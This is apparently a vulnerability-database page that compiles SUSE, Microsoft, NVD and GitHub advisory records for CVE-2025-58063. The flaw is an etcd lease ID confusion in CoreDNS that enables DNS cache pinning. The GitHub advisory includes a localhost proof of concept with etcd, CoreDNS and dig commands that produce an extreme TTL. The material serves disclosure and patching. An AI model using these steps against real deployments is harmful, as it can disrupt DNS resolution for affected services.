"product_id": "coredns-extras-1.12.4-2.1.ppc64le"
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.s390x",
"product": {
"name": "coredns-1.12.4-2.1.s390x",
"product_id": "coredns-1.12.4-2.1.s390x"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.s390x",
"product": {
"name": "coredns-extras-1.12.4-2.1.s390x",
"product_id": "coredns-extras-1.12.4-2.1.s390x"
}
}
],
"category": "architecture",
"name": "s390x"
},
{
"branches": [
{
"category": "product_version",
"name": "coredns-1.12.4-2.1.x86_64",
"product": {
"name": "coredns-1.12.4-2.1.x86_64",
"product_id": "coredns-1.12.4-2.1.x86_64"
}
},
{
"category": "product_version",
"name": "coredns-extras-1.12.4-2.1.x86_64",
"product": {
"name": "coredns-extras-1.12.4-2.1.x86_64",
"product_id": "coredns-extras-1.12.4-2.1.x86_64"
}
}
],
"category": "architecture",
"name": "x86_64"
},
{
"branches": [
{
"category": "product_name",
"name": "openSUSE Tumbleweed",
"product": {
"name": "openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed",
"product_identification_helper": {
"cpe": "cpe:/o:opensuse:tumbleweed"
}
}
}
],
"category": "product_family",
"name": "SUSE Linux Enterprise"
}
],
"category": "vendor",
"name": "SUSE"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64"
},
"product_reference": "coredns-1.12.4-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le"
},
"product_reference": "coredns-1.12.4-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x"
},
"product_reference": "coredns-1.12.4-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-1.12.4-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64"
},
"product_reference": "coredns-1.12.4-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.aarch64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64"
},
"product_reference": "coredns-extras-1.12.4-2.1.aarch64",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.ppc64le as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le"
},
"product_reference": "coredns-extras-1.12.4-2.1.ppc64le",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.s390x as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x"
},
"product_reference": "coredns-extras-1.12.4-2.1.s390x",
"relates_to_product_reference": "openSUSE Tumbleweed"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "coredns-extras-1.12.4-2.1.x86_64 as component of openSUSE Tumbleweed",
"product_id": "openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
},
"product_reference": "coredns-extras-1.12.4-2.1.x86_64",
"relates_to_product_reference": "openSUSE Tumbleweed"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58063",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-58063"
}
],
"notes": [
{
"category": "general",
"text": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-58063",
"url": "https://www.suse.com/security/cve/CVE-2025-58063"
},
{
"category": "external",
"summary": "SUSE Bug 1249389 for CVE-2025-58063",
"url": "https://bugzilla.suse.com/1249389"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.4,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:coredns-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-1.12.4-2.1.x86_64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.aarch64",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.ppc64le",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.s390x",
"openSUSE Tumbleweed:coredns-extras-1.12.4-2.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2025-09-18T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2025-58063"
}
]
}
msrc_cve-2025-58063
Vulnerability from csaf_microsoft
Notes
{
"document": {
"category": "csaf_vex",
"csaf_version": "2.0",
"distribution": {
"text": "Public",
"tlp": {
"label": "WHITE",
"url": "https://www.first.org/tlp/"
}
},
"lang": "en-US",
"notes": [
{
"category": "general",
"text": "To determine the support lifecycle for your software, see the Microsoft Support Lifecycle: https://support.microsoft.com/lifecycle",
"title": "Additional Resources"
},
{
"category": "legal_disclaimer",
"text": "The information provided in the Microsoft Knowledge Base is provided \\\"as is\\\" without warranty of any kind. Microsoft disclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a particular purpose. In no event shall Microsoft Corporation or its suppliers be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages, even if Microsoft Corporation or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply.",
"title": "Disclaimer"
}
],
"publisher": {
"category": "vendor",
"contact_details": "secure@microsoft.com",
"name": "Microsoft Security Response Center",
"namespace": "https://msrc.microsoft.com"
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58063 CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58063.json"
},
{
"category": "external",
"summary": "Microsoft Support Lifecycle",
"url": "https://support.microsoft.com/lifecycle"
},
{
"category": "external",
"summary": "Common Vulnerability Scoring System",
"url": "https://www.first.org/cvss"
}
],
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion",
"tracking": {
"current_release_date": "2025-09-11T01:01:49.000Z",
"generator": {
"date": "2025-10-20T03:48:57.136Z",
"engine": {
"name": "MSRC Generator",
"version": "1.0"
}
},
"id": "msrc_CVE-2025-58063",
"initial_release_date": "2025-09-02T00:00:00.000Z",
"revision_history": [
{
"date": "2025-09-11T01:01:49.000Z",
"legacy_version": "1",
"number": "1",
"summary": "Information published."
}
],
"status": "final",
"version": "1"
}
},
"product_tree": {
"branches": [
{
"branches": [
{
"branches": [
{
"category": "product_version",
"name": "3.0",
"product": {
"name": "Azure Linux 3.0",
"product_id": "17084"
}
},
{
"category": "product_version",
"name": "2.0",
"product": {
"name": "CBL Mariner 2.0",
"product_id": "17086"
}
}
],
"category": "product_name",
"name": "Azure Linux"
},
{
"branches": [
{
"category": "product_version_range",
"name": "\u003cazl3 coredns 1.11.4-8",
"product": {
"name": "\u003cazl3 coredns 1.11.4-8",
"product_id": "1"
}
},
{
"category": "product_version",
"name": "azl3 coredns 1.11.4-8",
"product": {
"name": "azl3 coredns 1.11.4-8",
"product_id": "20419"
}
},
{
"category": "product_version_range",
"name": "\u003ccbl2 coredns 1.11.1-19",
"product": {
"name": "\u003ccbl2 coredns 1.11.1-19",
"product_id": "2"
}
},
{
"category": "product_version",
"name": "cbl2 coredns 1.11.1-19",
"product": {
"name": "cbl2 coredns 1.11.1-19",
"product_id": "20137"
}
}
],
"category": "product_name",
"name": "coredns"
}
],
"category": "vendor",
"name": "Microsoft"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003cazl3 coredns 1.11.4-8 as a component of Azure Linux 3.0",
"product_id": "17084-1"
},
"product_reference": "1",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "azl3 coredns 1.11.4-8 as a component of Azure Linux 3.0",
"product_id": "20419-17084"
},
"product_reference": "20419",
"relates_to_product_reference": "17084"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "\u003ccbl2 coredns 1.11.1-19 as a component of CBL Mariner 2.0",
"product_id": "17086-2"
},
"product_reference": "2",
"relates_to_product_reference": "17086"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "cbl2 coredns 1.11.1-19 as a component of CBL Mariner 2.0",
"product_id": "20137-17086"
},
"product_reference": "20137",
"relates_to_product_reference": "17086"
}
]
},
"vulnerabilities": [
{
"cve": "CVE-2025-58063",
"notes": [
{
"category": "general",
"text": "GitHub_M",
"title": "Assigning CNA"
}
],
"product_status": {
"fixed": [
"20419-17084",
"20137-17086"
],
"known_affected": [
"17084-1",
"17086-2"
],
"under_investigation": [
"17084-3"
]
},
"references": [
{
"category": "self",
"summary": "CVE-2025-58063 CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion - VEX",
"url": "https://msrc.microsoft.com/csaf/vex/2025/msrc_cve-2025-58063.json"
}
],
"remediations": [
{
"category": "vendor_fix",
"date": "2025-09-11T01:01:49.000Z",
"details": "1.11.4-9:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17084-1"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
},
{
"category": "vendor_fix",
"date": "2025-09-11T01:01:49.000Z",
"details": "1.11.1-21:Security Update:https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade",
"product_ids": [
"17086-2"
],
"url": "https://learn.microsoft.com/en-us/azure/azure-linux/tutorial-azure-linux-upgrade"
}
],
"scores": [
{
"cvss_v3": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"environmentalsScore": 0.0,
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"temporalScore": 7.1,
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"17084-1",
"17086-2"
]
}
],
"title": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
]
}
fkie_cve-2025-58063
Vulnerability from fkie_nvd
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf | ||
| security-advisories@github.com | https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9 | ||
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9 |
| Vendor | Product | Version |
|---|
{
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "CoreDNS is a DNS server that chains plugins. Starting in version 1.2.0 and prior to version 1.12.4, the CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling DNS cache pinning attacks. This effectively creates a DoS condition for DNS resolution of affected services. The `TTL()` function in `plugin/etcd/etcd.go` incorrectly casts etcd lease IDs (64-bit integers) to uint32 and uses them as TTL values. Large lease IDs become very large TTLs when cast to uint32. This enables cache pinning attacks. Version 1.12.4 contains a fix for the issue."
}
],
"id": "CVE-2025-58063",
"lastModified": "2025-09-11T17:14:25.240",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.1,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "LOW",
"privilegesRequired": "LOW",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"exploitabilityScore": 2.8,
"impactScore": 4.2,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2025-09-09T20:15:48.057",
"references": [
{
"source": "security-advisories@github.com",
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
},
{
"source": "security-advisories@github.com",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Awaiting Analysis",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-681"
}
],
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
}
ghsa-93mf-426m-g6x9
Vulnerability from github
Summary
The CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.
Details
In plugin/etcd/etcd.go, the TTL() function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:
go
func (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {
etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration
// ... rest of function uses etcdTTL as actual TTL
}
Lease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.
This enables cache pinning attacks, such as:
- Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).
- Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).
- CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.
- Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.
Some resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.
PoC
- Launch etcd:
bash
etcd \
--data-dir ./etcd-data \
--listen-client-urls http://127.0.0.1:2379 \
--advertise-client-urls http://127.0.0.1:2379 \
--listen-peer-urls http://127.0.0.1:2380 \
--initial-advertise-peer-urls http://127.0.0.1:2380 \
--initial-cluster default=http://127.0.0.1:2380 \
--name default \
--initial-cluster-token etcd-ttl-poc \
--initial-cluster-state new &
- Prepare CoreDNS configuration:
bash
cat > Corefile << 'EOF'
skydns.local {
etcd {
path /skydns
endpoint http://localhost:2379
debug
}
log
errors
}
EOF
- Launch CoreDNS:
bash
coredns -conf Corefile -dns.port=1053
- Create an etcd record called
large-lease-servicewith a lease grant of 1 hour:
```bash LEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk '{print $2}')
etcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service '{ "host": "192.168.1.101", "port": 8080 }' --lease=$LEASE_ID ```
- Verify the lease details:
bash
$ etcdctl lease timetolive $LEASE_ID
lease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)
- Query the DNS record and observe the record TTL at 28 years:
bash
$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A
large-lease-service.skydns.local. 901209123 IN A 192.168.1.101
Impact
Affects any CoreDNS deployment using the etcd plugin for service discovery.
- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.
- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)
- Confidentiality: None.
The bug was introduced in #1702 as part of the CoreDNS v1.2.0 release.
Mitigation
The TTL function should utilise etcd's Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.
Credit
Thanks to @thevilledev for disclovering this vulnerability and contributing a fix.
For more information
Please consult our security guide for more information regarding our security process.
{
"affected": [
{
"package": {
"ecosystem": "Go",
"name": "github.com/coredns/coredns"
},
"ranges": [
{
"events": [
{
"introduced": "1.2.0"
},
{
"fixed": "1.12.4"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58063"
],
"database_specific": {
"cwe_ids": [
"CWE-681"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-09T19:19:33Z",
"nvd_published_at": "2025-09-09T20:15:48Z",
"severity": "HIGH"
},
"details": "# Summary\n\nThe CoreDNS etcd plugin contains a TTL confusion vulnerability where lease IDs are incorrectly used as TTL values, enabling cache pinning for very long periods. This can effectively cause a denial of service for DNS updates/changes to affected services.\n\n# Details\n\nIn `plugin/etcd/etcd.go`, the `TTL()` function casts the 64-bit etcd lease ID to a uint32 and uses it as the TTL:\n\n```go\nfunc (e *Etcd) TTL(kv *mvccpb.KeyValue, serv *msg.Service) uint32 {\n etcdTTL := uint32(kv.Lease) // BUG: Lease ID != TTL duration\n // ... rest of function uses etcdTTL as actual TTL\n}\n```\n\nLease IDs are identifiers, not durations. Large lease IDs can produce very large TTLs after truncation, causing downstream resolvers and clients to cache answers for years.\n\nThis enables cache pinning attacks, such as:\n\n1. Attacker has etcd write access (compromised service account, misconfigured RBAC/TLS, exposed etcd, insider).\n2. Attacker writes/updates a key and attaches any lease (the actual lease duration is irrelevant; the ID is misused).\n4. CoreDNS serves the record with an extreme TTL; downstream resolvers/clients cache it for a very long time.\n5. Even after fixing/deleting the key (or restarting CoreDNS), clients continue to use the cached answer until their caches expire or enforce their own TTL caps.\n\nSome resolvers implement TTL caps, but values and defaults vary widely and are not guaranteed.\n\n# PoC\n\n1. Launch etcd:\n\n```bash\netcd \\\n --data-dir ./etcd-data \\\n --listen-client-urls http://127.0.0.1:2379 \\\n --advertise-client-urls http://127.0.0.1:2379 \\\n --listen-peer-urls http://127.0.0.1:2380 \\\n --initial-advertise-peer-urls http://127.0.0.1:2380 \\\n --initial-cluster default=http://127.0.0.1:2380 \\\n --name default \\\n --initial-cluster-token etcd-ttl-poc \\\n --initial-cluster-state new \u0026\n```\n\n2. Prepare CoreDNS configuration:\n\n```bash\ncat \u003e Corefile \u003c\u003c \u0027EOF\u0027\nskydns.local {\n etcd {\n path /skydns\n endpoint http://localhost:2379\n debug\n }\n log\n errors\n}\nEOF\n```\n\n3. Launch CoreDNS:\n\n```bash\ncoredns -conf Corefile -dns.port=1053\n```\n\n4. Create an etcd record called `large-lease-service` with a lease grant of 1 hour:\n\n```bash\nLEASE_ID=$(etcdctl --endpoints=http://127.0.0.1:2379 lease grant 3600 | awk \u0027{print $2}\u0027)\n\netcdctl --endpoints=http://127.0.0.1:2379 put /skydns/local/skydns/large-lease-service \u0027{\n \"host\": \"192.168.1.101\",\n \"port\": 8080\n}\u0027 --lease=$LEASE_ID\n```\n\n7. Verify the lease details:\n\n```bash\n$ etcdctl lease timetolive $LEASE_ID\nlease 7c4a98dd35b75c23 granted with TTL(3600s), remaining(3252s)\n```\n\n8. Query the DNS record and observe the record TTL at 28 years:\n\n```bash\n$ dig +noall +answer @127.0.0.1 -p 1053 large-lease-service.skydns.local A\nlarge-lease-service.skydns.local. 901209123 IN A 192.168.1.101\n```\n\n# Impact\n\nAffects any CoreDNS deployment using the etcd plugin for service discovery.\n\n- Availability: High as service changes (IP rotations, failovers, rollbacks) may be ignored for extended periods by caches.\n- Integrity: Low as stale/incorrect answers persist abnormally long. (Note: attacker with etcd write could already point to malicious endpoints; the bug magnifies persistence.)\n- Confidentiality: None.\n\nThe bug was introduced in #1702 as part of the CoreDNS [v1.2.0 release](https://github.com/coredns/coredns/releases/tag/v1.2.0).\n\n# Mitigation\n\nThe TTL function should utilise etcd\u0027s Lease API to determine the proper TTL for leased records. Add configurable limits for minimum and maximum TTL when passing lease records, to clamp potentially extreme TTL values set as lease grant.\n\n# Credit\n\nThanks to [@thevilledev](https://github.com/thevilledev) for disclovering this vulnerability and contributing a fix.\n\n# For more information\n\nPlease consult our [security guide](https://github.com/coredns/coredns/blob/master/.github/SECURITY.md) for more information regarding our security process.",
"id": "GHSA-93mf-426m-g6x9",
"modified": "2025-09-10T21:07:40Z",
"published": "2025-09-09T19:19:33Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/security/advisories/GHSA-93mf-426m-g6x9"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58063"
},
{
"type": "WEB",
"url": "https://github.com/coredns/coredns/commit/e1768a5d272e9da649dfb8588595e5c6e4e640bf"
},
{
"type": "PACKAGE",
"url": "https://github.com/coredns/coredns"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"type": "CVSS_V3"
}
],
"summary": "CoreDNS: DNS Cache Pinning via etcd Lease ID Confusion"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.